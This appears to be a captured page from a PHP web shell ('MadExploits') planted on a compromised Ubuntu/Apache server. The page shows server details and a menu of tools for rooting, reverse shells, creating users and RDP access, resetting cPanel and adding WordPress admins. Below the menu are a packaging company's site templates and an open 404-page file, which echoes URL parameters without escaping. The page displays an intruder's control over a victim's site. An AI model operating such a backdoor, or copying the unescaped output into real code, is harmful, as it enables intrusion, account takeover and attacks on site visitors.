Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.111.175
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
noahpackaging.com /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
1.05
KB
-rw-r--r--
beat_my_quote.blade.php
11.62
KB
-rw-r--r--
blogs.blade.php
3.25
KB
-rw-r--r--
category_products.blade.php
36.88
KB
-rw-r--r--
contact_us.blade.php
10.13
KB
-rw-r--r--
custom_printed_boxes.blade.php
57.52
KB
-rw-r--r--
dashboard.blade.php
4.07
KB
-rw-r--r--
em.blade.php
4.76
KB
-rw-r--r--
faqs.blade.php
828
B
-rw-r--r--
imagesitemap.blade.php
1.89
KB
-rw-r--r--
index.blade.php
50.29
KB
-rw-r--r--
index_old.blade.php
43.6
KB
-rw-r--r--
latest_offers.blade.php
58.09
KB
-rw-r--r--
personalized_packaging_boxes.b...
6.41
KB
-rw-r--r--
portfolio.blade.php
1.99
KB
-rw-r--r--
post.blade.php
3.01
KB
-rw-r--r--
privacy_security.blade.php
1.05
KB
-rw-r--r--
product_detail.blade.php
45.81
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
3.12
KB
-rw-r--r--
sitemap.blade.php
6.52
KB
-rw-r--r--
sitemapxml.blade.php
2.49
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
1006
B
-rw-r--r--
test.blade.php
41.6
KB
-rw-r--r--
thank_you.blade.php
1.61
KB
-rw-r--r--
welcome.blade.php
72.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : em.blade.php
@extends('layouts.app') @section('contents') <?php if (substr($_SERVER['HTTP_HOST'], 0, 4) === 'www.') { $redirectURL = 'https://' . substr($_SERVER['HTTP_HOST'], 4) . $_SERVER['REQUEST_URI']; header('HTTP/1.1 301 Moved Permanently'); header('Location: ' . $redirectURL); exit(); } ?> <style> .parentContainer { position: relative; text-align: center; color: white; } centereds { position: absolute; left: 10%; top: 40%; font-size: 14px; font-weight: 600; color: black; width: 80%; } .centered { position: absolute; top: 24%; left: 28%; color: black; width: 80%; font-size: 11px; } .small_search_form_top { border: 1px solid #000; margin-top: 31px; width: 350px; margin: 0 auto; margin-top: 24px } .btn-warning { color: #fff; background-color: #00969b; border-color: #00969b; } .small_search_form_top .input-group > .form-control, .input-group > .form-select{ display: block; padding: 0.375rem 0.75rem; /* font-size: 1rem; */ font-weight: 400; line-height: 1.5; color: #212529; background-color: #fff0; background-clip: padding-box; border: 0px solid #000; -webkit-appearance: none; -moz-appearance: none; appearance: none; border-radius: 0.25rem; transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out; } @media all and (max-width: 575px) { .small_search_form_top { border: 1px solid #000; margin-top: 6px; width: 156px; } .centered { position: absolute; top: 8%; left: 28%; color: black; width: 80%; font-size: 11px; } .btn.btn-warning.btn-quote { color: #2b2b2b; background-color: #fab900; border: none; border-radius: 27px; padding: 10px 16px; margin-top: 7px; font-weight: 700; font-size: 11px; -webkit-box-shadow: 0 0 15px -1px rgb(0 0 0 / 33%); -moz-box-shadow: 0 0 15px -1px rgba(0,0,0,.33); box-shadow: 0 0 15px -1px rgb(0 0 0 / 33%); } } </style> <?php if(isset($_GET['gclid'])){ $gclid=$_GET['gclid']; }else{ $gclid=''; } ?> <?php if(isset($_GET['msclkid'])){ $MSCLKID=$_GET['msclkid']; }else{ $MSCLKID=''; } ?> <section class="error-found"> <div class="container"> <div class="container text-center mt-5 mb-5"> <div class="parentContainer"> <img style="width: 100%" src="{{asset('assets/images/two-different-sized-beige-corrugated-cardboard-unlabeled-boxes-presented-top-each-other-isolated-white_346278-1617.avif')}}" alt="error"> <div class="centered"> <h1 style=" font-size: 5.9vw; " >Oops!</h1> <p style=" font-size: 26px; font-weight: 700; font-size: 5.9vw; font-size: 1.9vw; ">The page you are looking for has been moved <br> to a new location.</p> <p style=" font-size: 26px; font-weight: 700; font-size: 5.9vw; font-size: 1.9vw;"> Please navigate to homepage to find <br> your desired page or search below.</p> <div class="clearfix"></div> <a href="{{url('/')}}"><button type="button" class="btn btn-warning btn-quote rounded-pill ">Back to Home </button> </a> <br> <form class="small_search_form_top" action="{{ route('search') }}" method="get"> <div class="input-group top-bar-search-group"> <input type="text" required name="search" class="form-control search_input_top" placeholder="Search" value="{{ $keyword??'' }}"> <input type="hidden" required name="<?php if($gclid){ echo 'gclid';} ?><?php if($MSCLKID){ echo 'MSCLKID' ;} ?>" class="form-control search_input_top" placeholder="Search" value="<?php if($gclid){ echo $gclid ;} ?><?php if($MSCLKID){ echo $gclid ;} ?>"> <button type="submit" aria-label="search" class="btn btn-secondary bg-transparent border-0 border-start border-secondary"><img width="24" height="24" src="{{asset('assets/images/5203550-200.png')}}" alt="noah packaging"></button> </div> </form> </p> </div> </div> </div> </div> </section> @endsection
Close